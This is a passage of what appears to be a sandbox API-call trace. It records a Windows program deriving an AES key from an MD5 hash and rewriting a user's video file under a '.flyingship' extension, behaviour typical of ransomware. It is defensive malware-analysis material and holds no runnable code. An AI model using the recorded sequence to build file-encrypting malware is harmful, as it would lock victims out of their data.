lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0192.528] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.528] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.528] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.528] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0192.528] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.529] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0192.530] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.530] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.530] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0192.530] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0192.530] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0192.530] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.531] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.531] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.531] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0192.531] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0192.531] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0192.531] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.531] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.531] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.531] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.531] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0192.531] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.531] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.531] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0192.532] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.532] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0192.532] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0192.532] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.532] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.532] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0192.532] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0192.532] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0192.532] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.532] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.532] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.532] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.532] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0192.532] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0192.532] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0192.532] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.532] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0192.532] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.533] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.533] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.533] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.533] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0192.533] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.533] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.533] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.533] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0192.533] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.533] CryptHashData (hHash=0x90ae18, pbData=0x8dec18, dwDataLen=0x19, dwFlags=0x1) returned 1 [0192.533] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.533] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.533] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.533] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.533] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0192.533] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0192.534] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0192.534] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.534] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0192.534] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.534] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.534] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.534] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.534] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.534] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.534] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0192.534] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.534] CryptDestroyHash (hHash=0x90ae18) returned 1 [0192.534] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.534] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.534] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.534] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.535] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.535] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ccosswxcev8zf\\7999fjy.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0192.536] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.536] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0192.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0192.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0192.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0192.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0192.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0192.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0192.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0192.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0192.536] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0192.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0192.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0192.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0192.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0192.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0192.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0192.536] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0192.536] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0192.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0192.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0192.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0192.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0192.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0192.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0192.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0192.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0192.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0192.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0192.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0192.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0192.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0192.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0192.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0192.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0192.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0192.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0192.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0192.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0192.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0192.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0192.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0192.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0192.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0192.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0192.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0192.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0192.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0192.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0192.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0192.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0192.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0192.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0192.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0192.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0192.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0192.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0192.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0192.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0192.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0192.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0192.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0192.538] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ccosswxcev8zf")) returned 0x10 [0192.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0192.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0192.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0192.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0192.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0192.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0192.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0192.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0192.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0192.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0192.539] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.flyingship.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ccosswxcev8zf\\7999fjy.flyingship.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0192.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0192.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0192.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0192.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0192.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0192.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0192.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0192.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0192.542] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0192.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0192.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0192.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0192.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0192.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0192.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0192.543] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0192.543] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0192.543] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0192.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0192.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0192.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0192.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0192.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0192.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0192.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0192.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0192.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0192.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0192.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0192.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0192.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0192.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0192.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0192.544] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0192.544] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, 